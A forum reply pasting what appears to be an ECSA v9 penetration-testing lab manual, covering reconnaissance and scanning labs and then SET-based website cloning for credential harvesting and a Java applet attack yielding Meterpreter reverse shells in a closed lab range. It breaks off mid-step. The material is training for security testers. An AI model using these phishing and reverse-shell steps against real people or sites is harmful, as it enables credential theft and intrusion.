ECSA v9 Labs
09-14-2017, 03:44 PM
Post: #1
ECSA v9 Labs
Hi,
How can I get the ECSA v9 labs guide?
Many thanks
09-20-2017, 12:38 PM
Post: #2
RE: ECSA v9 Labs
Module 00: ECSAv9 Testing
Objective
Testing
Scenario
Testing

Virtual Machines
1. Windows Server 2012 Subnet A
2. Windows 8 Subnet A
3. Windows Server 2008 Subnet A
4. Windows 7 Subnet A
5. Kali Linux Subnet A
6. Database Server Subnet B
7. Active Directory Subnet C
8. Red Hat Enterprise Linux - Subnet C
9. Web Server Subnet C
10. Accounts Dept Subnet D
11. Advertisement Dept. Subnet D
12. HR Dept Subnet D
13. Sales Department Subnet D
14. Marketing Dept Subnet D
15. NAT Router

Information Gathering
Penetration testing is much more than just running exploits against vulnerable systems. In fact, a penetration test begins before penetration testers have even made contact with the victim's systems. Rather than blindly throwing out exploits and praying that one of them returns a shell, a penetration tester meticulously studies the environment for potential weaknesses and their mitigating factors. By the time a penetration tester runs an exploit, he or she is nearly certain that it will be successful. Since failed exploits can in some cases cause a crash or even damage to the target system, or at the very least make the target un-exploitable in the future, penetration testers won't get the best results, or deliver the most thorough report to their clients, if they blindly turn an automated exploit machine on the target network with no preparation. A penetration tester collects information about a company, such as internal and external links of the company's website, people working in the company, geographical location, DNS information, competitive intelligence, network range, etc. This information is collected in order to search for vulnerabilities, so as to exploit and sniff valuable information. In order to become an expert penetration tester and security auditor, you must know various techniques to gather a company's information.

1. Logon to Windows Server 2012 Machine
Select Windows Server 2012 Subnet A from the Machines pane. Go to Machine Commands and click Ctrl + Alt + Delete.
2. Enter the Credentials
In the log on box enter the following Credentials and press Enter:
User Name: Administrator
Password: Pa$$w0rd
You can use the Paste Username and Paste Password options from the Machine Commands menu to enter the user name and password.
3. Close the Server Manager Window
Click the Close button at the top right corner of the Server Manager window.
4. Install Web Data Extractor
Navigate to E:\ECSAv8 Module 08 Information Gathering\Tools for Extracting Company’s Data\Web Data Extractor, double-click wde.exe file and follow the wizard driven installation steps to install Web Data Extractor.
5. Launch Web Data Extractor
Hover the mouse cursor to the lower-left corner of the desktop and click the Start menu icon.
In the Start menu, click Web Data Extractor to launch the application Web Data Extractor.
6. Web Data Extractor Main Window
Web Data Extractor (Web Data Extractor 8.3) main window appears as shown in the following screenshot:
7. Start a New Session
Click New to start a new session.
Session settings window appears as shown in the below screenshot.
8. Customize the Settings
Type a URL (http://www.xsecurity.com) in the Starting URL field.
Check the option Stay within full URL.
Check all the options under Save data section and click OK.
9. Start the Data Extraction
Click Start to initiate the data extraction.
Web Data Extractor will start collecting the information (emails, phones, faxes, etc.). Once the data extraction process is completed, click anywhere on the window. An Information dialog box appears. Click OK.
10. Collect the Extracted Information
The extracted information can be viewed by opening each of the tabs (Meta tags, Emails, Phones, etc.)
11. Collect Meta tags
Select the Meta tags tab to view the URL, Title, Keywords, Description, Host, Domain, and Page size information.
12. Collect Emails
Select Emails tab to view the Email, Name, URL, Title, Host, Keywords density, etc. information related to emails.
13. Collect Phone numbers
Select the Phones tab to view the information related to phone like Phone number, Source, Tag, URL, Title, Host, Keywords density and Keywords on Page.
14. Collect Fax Numbers
Select the Faxes tab to view the information related to fax like Fax, Source, Tag, URL, Title, Host, Keywords density and Keywords on Page.
15. Collect Merged List
Select the Merged List tab to view the information like URL, Host, Domain, Title, Description, Keywords, Email, Phone, Phone Source, Phone tag, Fax, Fax Source and Fax tag on Page.
16. Collect the Urls
Select the Urls tab to view all the URLs extracted.
17. Collect the Inactive Sites
Select the Inactive Sites tab to view all the extracted URLs of the inactive sites.
18. Save the Session
Go to File and click Save session to save the session.
You can also press Ctrl+S on the keyboard to save the session.
19. Specify a Session Name
Save session dialog box appears.
Specify xsecurity as the session name under Please specify session name: text field and click OK.
A session name will be assigned by default. You can either change the name or continue the lab with default name.
20. Save Meta tags
Click Meta tags tab and then click the floppy icon located at the top left corner of the Meta tags section.
21. Information Pop-up
As we are using a demo version of Web Data Extractor, an Information Pop-up appears stating that you cannot save more than 10 records in demo version. Click OK to close the pop-up.
22. Save Meta tags
Save Meta tags window appears, choose a file format and click Save.
The file format chosen in this lab is HTML.
23. Open the Saved File
Navigate to the location C:\Program Files (x86)\WebExtractor\Data\xsecurity.com and double-click metatags_data.html to view the report.
24. Open the Saved File (Cont'd)
The report appears in default browser as shown in the following screenshot:
25. End of the Lab task
In the same way, you need to save the other information related to the target, such as emails, phones and so on.
Website data is successfully collected using Web Data Extractor. Close the Application as well as all the windows that were opened.
26. Monitor Web Updates
Install WebSite-Watcher 2013 tool in order to monitor web updates.
WebSite-Watcher is a program with closed code that tracks changes in the user-defined web pages.
27. Install WebSite-Watcher 2013
Navigate to E:\ECSAv8 Module 08 Information Gathering\Web Updates Monitoring Tools\WebSite-Watcher 2013, double-click wswsetup.exe and follow the wizard driven installation steps to install WebSite-Watcher tool.
28. Install WebSite-Watcher 2013 (Cont'd)
On completion of installation, click Finish.
You may uncheck the Launch Website-Watcher option and click Finish, such that the application does not launch automatically after installation.
29. WebSite-Watcher Main Window
WebSite-Watcher main window (Website-Watcher 2013 (13.0)) appears on the screen along with a Welcome wizard, follow the wizard driven steps.
30. WebSite-Watcher
WebSite-Watcher pop-up appears on the screen, click Continue.
As we are using a trial version of WebSite-Watcher, choose the required evaluation option.
31. WebSite-Watcher main window
WebSite-Watcher main window appears as shown in the following screenshot:
32. Wizard: New Bookmark
Click New, a Wizard: New Bookmark window appears.
Select The page can be accessed directly radio button and enter http://www.xsecurity.com as the target company’s URL in URL: text field. Then click Next.
33. Select Page Type Section
The application initializes the page and Select Page Type section appears in the Wizard: New Bookmark window.
Select Webpage radio button and click Next.
34. Finished Section
Finished section appears in the Wizard: New Bookmark window. Click Finish.
35. Monitor the Updates
Double-click the target link http://www.xsecurity.com (third in list) to monitor the updates made in the website.
36. End of the Lab Task
Web updates are successfully monitored using WebSite-Watcher 2013.
Close the application as well as all the windows that are open.
37. Mirror a Website
Install WinHTTrack Web Site Copier in order to mirror a specific website.
HTTrack Website copier allows you to download a World Wide Web site to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.
38. Install WinHTTrack Website Copier
Navigate to E:\ECSAv8 Module 08 Information Gathering\Website Mirroring Tools\HTTrack Web Site Copier, double-click httrack_x64-3.47.24.exe and follow wizard driven installation steps to install HTTrack tool.
39. Install WinHTTrack Website Copier (Cont'd)
On completion of installation, uncheck View history.txt file option and click Finish.
You may uncheck the Launch WinHTTrack Website Copier option and click Finish, such that the application does not launch automatically after installation.
40. About WinHTTrack Website Copier
About WinHTTrack Website Copier pop-up appears along with WinHTTrack Website Copier main window (WinHTTrack Website Copier -[New Project 1]).
Click OK in the pop-up.
41. WinHTTrack Website Copier Main Window
WinHTTrack Website Copier main window appears, click Next.
42. Configure Settings
Enter xsecurity in the New Project name: field, choose info in the Project category: drop-down list, leave the Base path field to default, and click Next.
43. Configure Settings (Cont'd)
Leave Action: field to default, type http://www.xsecurity.com in the Web Address: (URL) field and leave URL list (.txt): and Preferences and mirror options: fields to default. Click Next.
44. Configure Settings (Cont'd)
Check the Disconnect when finished option and leave the other options at their defaults. Click Finish.
45. Website Download
HTTrack starts copying content from the target company’s website as shown in the following screenshot:
46. Finish
Once the tool completes mirroring the website, click Finish.
47. Load the Saved File
WinHTTrack Website Copier main window appears, close the application.
Navigate to the location C:\My Web Sites\xsecurity and double-click index.html to view the mirrored website.
48. View the Mirrored Website
The mirrored xsecurity website appears in the default web browser. Browse various webpages in the website in order to examine the website.
49. End of the Lab Task
Website mirroring is successfully done using WinHTTrack Website Copier.
Close the web browser and all the windows that are open.
50. Close the Windows
Close all the windows that were opened while performing the lab.
In this lab, you have learned different techniques to gather information about a company.

Network Route Trace Using Path Analyzer Pro
Access can be gained to an organization's network, which allows a penetration tester to thoroughly learn about the organization's network environment for possible vulnerabilities. Taking all the information gathered into account, penetration testers study the systems to find the best routes of attack. The same tasks can be performed by an attacker, and the results could prove fatal for an organization. In such cases, as a penetration tester you should be competent to trace the network route, determine the network path, and troubleshoot network issues. Here you will be guided to trace the network route using the tool Path Analyzer Pro.

Lab Objectives

The objective of this lab is to help students research email addresses, network paths, and IP addresses. This lab helps to determine what ISP, router, or servers are responsible for a network problem.
1. Logon to Windows Server 2012 Subnet A Machine
Select Windows Server 2012 Subnet A from the Machines pane. Go to Machine Commands and click Ctrl + Alt + Delete.
If you are already logged in to the Windows Server 2012 Subnet A machine, skip to the Step no. 4 of this lab.
2. Enter the Credentials
In the log on box enter the following Credentials and press Enter:
User Name: Administrator
Password: Pa$$w0rd
You can use the Paste Username and Paste Password options from the Machine Commands menu to enter the user name and password.
3. Close the Server Manager Window
Click the Close button at the top right corner of the Server Manager window.
4. Install Path Analyzer Pro
To install Path Analyzer Pro, navigate to E:\ECSAv8 Module 08 Information Gathering\Traceroute Tools\Path Analyzer Pro, and double-click on PAPro27.msi.
Follow the wizard driven installation steps to install Path Analyzer Pro.
5. Launch Path Analyzer Pro
To launch Path Analyzer Pro, hover the mouse cursor on the lower-left corner of the desktop and click on Start, then click on Path Analyzer Pro 2.7 app from the menu.
6. Registration Form
Since this is a trial version, the Registration Form pop-up appears; click the Evaluate button.
7. Main Window of Path Analyzer Pro
The main window of Path Analyzer Pro appears as shown in the following screenshot:
8. Standard Options Section
Select the ICMP protocol in the Standard Options section from the left pane of the window.
9. Advanced Probe Details
Under Advanced Probe Details, check the Smart option in the Length of packet section and leave the rest of the options in this section at their default settings.
The firewall must be disabled for appropriate output.
10. Advanced Tracing Details
In the Advanced Tracing Details section, the options are set by default.
Ensure that Stop on control messages (ICMP) option in the Advance Tracing Details section is checked.
11. Perform Trace
To perform the trace after checking these options, select the target IP Address, in this lab we are using Web Server Subnet C machine IP address (10.10.30.3), and ensure that Smart (65535) option under Port field is checked by default.
12. Timed Trace
Now select Timed Trace from the drop-down menu as shown in the following screenshot.
13. Enter the Type Time of Trace
Now click on Trace button. Once you click on Trace button, Type time of trace pop-up appears.
Enter the time of the trace in the format HH:MM:SS. Then click the Accept button.
In this lab, trace time entered is 15 seconds.
14. Path Analyzer Pro Perform
While Path Analyzer Pro performs this trace, the Trace button automatically changes to Stop.
15. Report Tab
Click the Report tab to display a linear chart depicting the number of hops between you and the target.
16. Synopsis Tab
Click the Synopsis tab, which displays a one-page summary of your trace results.
17. Charts Tab
Click the Charts tab to view the result of your trace on a chart.
18. Stats Tab
Click the Stats tab, which features the Vital Statistics of your current trace.
19. Log Tab
In the Log tab you are able to see the logs recorded in the target machine.
20. Export the Report
To export the report, choose a domain (here, Synopsis) and click Export button in menu bar.
21. Save the Report
Save Synopsis As window appears, choose a location where you want to save the file (here, Desktop), specify a File name (10.10.30.3_Synopsis) and click Save.
In the same way, you can generate reports for other domains.
22. Examine the Saved Report
Navigate to Desktop and double-click 10.10.30.3_Synopsis.html.
23. Examine the Saved Report (Cont'd)
The Synopsis report for the Web Server Subnet C machine appears in the default web browser as shown in the following screenshot:
In this lab you have learned how to trace network paths, and IP addresses. This lab helped to determine what ISP, router, or servers are responsible for a network problem.

Gathering Information About a Target Using WhatWeb
WhatWeb identifies websites. It recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
The objective of this lab is to help students learn how to:
Identify the target website technologies
Perform aggressive scans
Log output in an XML format
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch WhatWeb
Go to Applications --> Kali Linux --> Web Applications --> Web Vulnerability Scanners --> whatweb. This launches whatweb application.
5. Scan a Target Website
Assume http://www.xsecurity.com is the target website. In this lab, you will be performing website fingerprinting on this website.
Type the command whatweb http://www.xsecurity.com and press Enter.
6. Analyze the Result
whatweb returns the xsecurity website infrastructure as shown in the following screenshot:
7. Set Verbose
Since the result returned by whatweb is difficult to analyze, you can apply verbosity so that whatweb arranges the result in a clear way.
Type the command whatweb -v http://www.xsecurity.com and press Enter.
8. Analyze the Result
WhatWeb re-arranges the result in a better understandable manner as shown in the following screenshot:
You may set WhatWeb in aggressive mode in order to obtain the version numbers of plugins used in the website.
9. Export the Result
You can export the result returned by WhatWeb. In order to export the result to a text file, type the command whatweb --log-verbose=xsecurity_report http://www.xsecurity.com and press Enter.
This will generate a report with the name xsecurity_report and save this file in the root folder.
10. View the Exported Result
Navigate to root folder in order to find the report containing the result. To open root folder, go to Places --> Home Folder.
11. View the Exported Result (Cont'd)
root folder appears, double-click xsecurity_report.
12. View the Exported Result (Cont'd)
The report appears in the text file as shown in the following screenshot. Analyze the result to get an idea about the website infrastructure.
In this lab, you have learned how to:
• Identify the target website technologies
• Perform aggressive scans
• Log output in an XML format

Perform OS Fingerprinting Using xprobe2
xprobe2 is an active OS fingerprinter. It actually sends probes to the target system, then gauges the OS from the system's response. In total, xprobe2 has 14 different modules it runs to help determine the OS. The objective of this lab is to help students learn how to perform OS fingerprinting on a target.
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch xprobe2
Go to Applications --> Kali Linux --> Information Gathering --> Live Host Identification --> xprobe2. This launches xprobe2 application.
5. Perform OS Detection
Assume http://www.xsecurity.com is the target website. In this lab, you will be performing OS fingerprinting on the machine hosting this website.
Type the command xprobe2 http://www.xsecurity.com and press Enter.
6. OS Detection Result
xprobe2 returns OS Fingerprinting results as shown in the following screenshot:
xprobe2 returns results as Windows XP (93%) and Windows 2003 Standard Edition (93%), both being the same Windows build. (We personally know that the website is hosted in Windows Server 2008).
7. List xprobe2 Modules
Issuing the -L switch displays all the modules featured in xprobe2.
8. Remove Unwanted Module
You may remove unwanted module while performing OS Fingerprinting. By doing this, you will be able to run xprobe2 in the absence of that particular module.
In this lab, we are removing module no. 2, i.e., ping:tcp_ping.
You can remove this module and perform OS Fingerprinting by issuing the command xprobe2 -D 2 http://www.xsecurity.com.
You can observe that Fingerprinting has been performed in the absence of this module.
9. Generate Report
You may use -o and -X switches to save the result as a report. -o allows you to log the results, while -X saves the result in XML format.
Issue the command xprobe2 -X -o OS_fingerprint http://www.xsecurity.com.
This command will perform OS fingerprinting on http://www.xsecurity.com and save the result to an XML file named OS_fingerprint.
The report is saved to the root folder by default.
10. Analyze the Report
Navigate to root folder in order to find the report containing the result. To open root folder, go to Places --> Home Folder.
11. Analyze the Report (Cont'd)
root folder appears, double-click OS_fingerprint.
12. Analyze the Report (Cont'd)
The report appears in the XML file as shown in the following screenshot. Analyze the result to get an idea about the operating system on which the website is hosted.
In this lab, you have learned how to perform OS fingerprinting on a target.

Vulnerability scanning with OpenVAS
While it is debatable how much a vulnerability scanner can do for a professional security tester, they are an important tool for helping us gather data and identify known vulnerabilities. When doing a penetration test we use a vulnerability scanner to provide us with a quick look at the state of the machines we are building in our target database.
The objective of this lab is to help students learn how to:
• Perform Vulnerability Assessment with the OpenVAS tool
• Analyze the output of the scan
• Add information to the target database
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch OpenVAS Scanner
Navigate to Applications --> Backtrack --> Vulnerability Assessment --> Vulnerability Scanners --> OpenVAS --> Start OpenVAS Scanner.
5. Launch OpenVAS Scanner (Cont'd)
Wait until all the services are started.
It takes 2-3 minutes for the OpenVAS Scanner to start.
Ignore the error returned by OpenVAS Security Manager.
6. Connect to OpenVAS Application
Launch the Iceweasel web browser. Type the URL https://127.0.0.1:9392 in the address bar and press Enter.
OpenVAS web GUI login page appears, enter the following credentials:
Username: admin
Password: toor
7. OpenVAS Homepage
OpenVAS Homepage as shown in the following screenshot:
8. Add a Target
Hover the mouse cursor on Configuration and select Targets.
9. Add a Target (Cont'd)
Click the star icon in order to add a new target.
10. Add a Target (Cont'd)
New Target window appears, enter the target name (Web Server Subnet C in this lab) in the Name text field, select Manual radio button under hosts section and enter the IP address of the target machine in the text field adjacent to Manual radio button. The IP address of Web Server Subnet C is 10.10.30.3.
Select All IANA assigned TCP 2012-02-10 option from the Port List drop-down list.
Leave the other options set to default and click Create Target.
11. Target Added to OpenVAS
A new Target has been added to OpenVAS as shown in the following screenshot:
12. Add a New Task
Hover the mouse cursor on Scan Management and click New Task.
13. Add a New Task (Cont'd)
New Task window appears, enter the name of the task (here, Web Server Subnet C Scan), choose Full and very deep scan from the Scan Config drop-down list and choose Web Server Subnet C from the Scan Targets drop-down list.
Leave the other options set to default and click Create Task.
This creates task which will be performed in the forthcoming steps.
14. Task Added to OpenVAS
The task named Web Server Subnet C Scan has been successfully added to OpenVAS as shown in the following screenshot:
15. Begin Vulnerability Scanning
Begin vulnerability scan by clicking the Start button (first icon in green color) under Actions section.
16. Vulnerability Scan Initiated
Vulnerability scan has been initiated successfully. Now, select the Refresh every 10 Sec. option from the drop-down list in the Tasks section and click the Refresh button.
By doing this, the scan status displayed under the status section will be updated every 10 seconds.
17. Vulnerability Scan Completed
It takes 5-10 minutes for the scan to complete. On completion of the scan, the status of the scan changes to Done as shown in the following screenshot:
18. Download the Report
Click on the date link under Reports section. The date (Nov 6 2012) displayed in this lab varies from your lab environment.
The date link may vary as you perform the lab.
19. Download the Report (Cont'd)
Report Summary webpage appears, select HTML from the drop-down list of Full report and click the download button (down arrow button).
This downloads the report in HTML format.
20. View the Report
Opening report pop-up appears, select Open with radio button, choose Iceweasel browser from the drop-down menu and click OK.
21. Examine the Vulnerability Report
Report appears in the web browser. Scroll down the report and examine all the vulnerabilities that are detected during the scan.
In this lab, you have learned how to:
• Perform Vulnerability Assessment with the OpenVAS tool
• Analyze the output of the scan
• Add information to the target database

Web Application Vulnerability Assessment Using Vega
Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS (cross-site scripting), SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: JavaScript.
The objective of this lab is to help students to learn how to:
• Use Vega and perform Web Application Vulnerability Assessment
• Generate reports and examine them
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Terminal
Open terminal console by navigating to Applications --> Accessories --> Terminal.
5. Launch Vega Vulnerability Scanner
Type vega in the terminal and press Enter. This launches vega vulnerability scanner.
6. Vega Main Window
Main window of Vega vulnerability scanner appears as shown in the following screenshot:
7. Start a New Scan
Click Scan from the menu bar and select Start New Scan.
8. Start a New Scan (Cont'd)
Select a Scan Target Wizard appears on the screen. Select Enter a base URI for scan radio button under Scan Target section, enter the target URL in the text field and click Next.
The target in this lab is xsecurity, so the URL we enter is goodshopping.xsecurity.com.
goodshopping.xsecurity.com is one of the services of http://www.xsecurity.com.
9. Start a New Scan (Cont'd)
Select Modules section appears, check both Injection Modules and Response Processing Modules options.
By checking these options, all the modules under these options will be selected.
Click Finish.
10. Scan Initiated
Vega scanner begins to perform vulnerability assessment on the target website and lists down the Scan Alert Summary. Wait until the scanning is completed.
11. Examine the Result
On completion of the scan, vega displays the scan alert summary as shown in the following screenshot:
12. Examine the Result (Cont'd)
Expand the nodes associated with the scan in the left pane under the Scan Alerts section and click on a node.
This displays the alerts/vulnerabilities in the web application.
In this lab, the vulnerability in login.aspx is viewed.
13. Examine the Result (Cont'd)
In the same way, you can expand all the nodes and select each alert/vulnerability to view information regarding the selected vulnerability.
14. Save the Scan Result
As the Vega vulnerability scanner does not provide an option to save the report, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
15. Save the Scan Result (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
16. Save the Scan Result (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named as goodshopping_vuln_high.
The root/Home folder location has been chosen to save the file.
17. Screenshot Saved
The screenshot has been saved to the home folder as shown in the following screenshot:
18. End of Lab Task
In the same way, you can take screenshots of all the vulnerabilities found and save them in the root location. Once you have saved all the screenshots, copy all of them to the pentesting folder where you are storing all the scan results.
In this lab, you have learned how to:
• Use and perform Web Application Vulnerability Assessment through Vega
• Generate reports and examine them

Sniffing Website Credentials using Social Engineering Toolkit (SET)
Social-Engineer Toolkit is an open-source Python-driven tool aimed at penetration testing around social engineering. SET is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies every day. Even though there are many hacking tools available within underground hacking communities, the Social Engineering Toolkit is a boon for attackers as it is freely available to perform spear-phishing attacks, website attacks, etc. Attackers can draft email messages, attach malicious files and send them to a large number of people using the spear-phishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/Tabnabbing, etc. all at once. Though numerous sorts of attacks can be performed using this toolkit, it is also a must-have tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily within the security community. As an Ethical Hacker, Penetration Tester, or Security Administrator, you should be absolutely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network.
The objective of this lab is to help students learn how to:
• Clone a website
• Obtain username and passwords using Tab nabbing method
• Generate reports for conducted penetration test
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Create a Cloned Website
You will be presented with a social engineering toolkit menu.
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Create a Cloned Website (Cont'd)
A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Create a Cloned Website (Cont'd)
In the next menu that appears, type 5 and press Enter to choose Web Jacking Attack Method.
8. Create a Cloned Website (Cont'd)
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. Create a Cloned Website (Cont'd)
Type the IP address of Kali Linux machine in the prompt for “IP address for the POST back in Harvester/Tabnabbing” and press Enter. In this lab, the IP address is 10.10.10.6.
10. Create a Cloned Website (Cont'd)
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used moviescope.xsecurity.com.
By entering the credentials, SET will initiate the cloning of the specified website.
moviescope.xsecurity.com is one of the services of http://www.xsecurity.com.
11. Website Cloned Successfully
SET has successfully cloned the website.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6) through mail or any other means.
In real-time, when a victim clicks the link, he/she will finally be redirected to the cloned website. Whatever the victim types in the login or any other text fields associated to the cloned website, they will be captured by SET and displayed on the SET screen.
12. Log in to Sales Department Subnet D Machine
Select Sales Department Subnet D from the Machines pane and log in to the Admin account of the machine.
13. Browse the Cloned Website
Launch Mozilla Firefox or any other web browser, type the URL http://10.10.10.6 in the address bar and press Enter.
As soon as you enter the URL, a page is displayed containing a notice that the site has been moved. Click on the link.
The web jacking attack method utilizes iframe replacements to make the highlighted URL link to appear legitimate. However, when a victim clicks the link, he/she will be redirected to the cloned website.
14. Log in to the Cloned Website
The cloned website appears on the browser. Assume that you are a user in the moviescope and you have access to the webpage.
Log in to the website using the following credentials:
Username: steve
Password: test
15. moviescope Legitimate Home Page
As soon as you click the Login button, you won't be able to log in; instead, you will be redirected to the legitimate home/login page of moviescope. You will be able to recognize this by observing the URL in the address bar.
In the meanwhile, SET running on Kali Linux machine harvests the credentials.
16. Credentials Harvested Successfully
Switch to Kali Linux Subnet A machine by selecting it from the Machines pane.
You will be able to view the harvested credentials as shown in the following screenshot:
17. Generate a Report
Once you have successfully gained the credentials of a user account, press Ctrl+C on the keyboard in order to generate the report regarding the harvested credentials.
18. Locate the Generated Report
The reports generated by SET are stored in the location /usr/share/set/src/logs under the name harvester.log.
19. Examine the Report
Double-click the harvester.log file to view the result obtained by web jacking attack method.
The report containing the harvested credentials appears as shown in the following screenshot:
In this lab, you have learned how to:
• Clone a website
• Obtain username and passwords using Web Jacking Attack Method
• Generate reports for conducted penetration test

Penetration Testing a Java Vulnerable Machine
Java Signed Applet exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.
The objective of this lab is to help students understand how to:
• Craft a Java Generic Payload
• Perform penetration testing on a Java vulnerable machine
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Choose Social Engineering Attacks
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Choose Website Attack Vectors
A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Choose Java Applet Attack Method
In the next menu that appears, type 1 and press Enter to choose Java Applet Attack Method.
8. Create a Cloned Website
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. NAT/PORT Forwarding
Type no and press Enter, since you are not using NAT/PORT Forwarding.
10. IP Address for Reverse Connection
Type the IP address of Kali Linux Subnet A machine and press Enter.
The IP address for reverse connection, entered in this lab is 10.10.10.6.
The target machine will establish a connection with the machine bearing the IP address 10.10.10.6 (Kali Linux) after it is subjected to exploitation.
11. Create a Cloned Website
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used http://www.xsecurity.com. This will initiate the cloning of the specified website.
12. Choose a Payload
Choose a payload with which you want to exploit the vulnerable target. In this lab, the payload used is Windows Meterpreter Reverse_TCP X64.
As the payload's index number is 7, type 7 and press Enter.
13. Choose the Default Port Number
Simply press Enter to choose the default port number.
14. Payload Handler Initiated
SET now initiates payload handler.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6) through mail or any other means.
In real-time, when a victim clicks the link, the payload will be executed and the attacking machine gains connection with the victim machine.
15. Log in to HR Dept Subnet D
Select HR Dept Subnet D from the Machines pane and log in to it.
16. Browse the Cloned Website
Launch Internet Explorer web browser, type the URL http://10.10.10.6 in the address bar and press Enter.
As soon as you press Enter, a Security Warning pop-up appears on the browser window.
Check I accept the risk and want to run the application option and click Run.
17. Session Established
As soon as you click Run, two meterpreter sessions will be opened. Type Sessions -i 1 or Sessions -i 2 command and press Enter.
Only one of these sessions works and the other fails. So, you need to try both of them and proceed with the one with which you are able to establish a connection and perform post exploitation.
18. Session Established (Cont'd)
In this lab, we have entered the command sessions -i 2 and tried to establish meterpreter session 2.
But the session failed to extract information when we issued the sysinfo command. In such a case, press Ctrl+Z and enter y to exit the session.
19. Establish a Meterpreter Session
Issue the command sessions -i 1. This will establish a connection with the meterpreter session 1.
Issue any meterpreter command like sysinfo and see whether it is able to return information regarding the target machine. If it establishes connection, it means that the meterpreter session 1 is working and you are able to perform post exploitation on the target machine.
20. Generate a Report
As you can't generate a report in such a case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
21. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
22. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named java_applet_meterpreter.
The root/ Home folder location has been chosen to save the file.
23. Screenshot Saved
The screenshot has been saved to the home folder as shown in the following screenshot:
In this lab, you have learned how to:
• Craft a Java Generic Payload
• Perform penetration testing on a Java vulnerable machine

Penetration Testing Browser Vulnerabilities in a Machine
The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the ability to clone the website and utilize browser-based exploits. Let’s take a quick look at exploiting a browser exploit through SET.
The objective of this lab is to:
• Generate a Browser Exploit
• Perform Penetration Testing on the Vulnerable Machine
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Choose Social Engineering Attacks
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Choose Website Attack Vectors
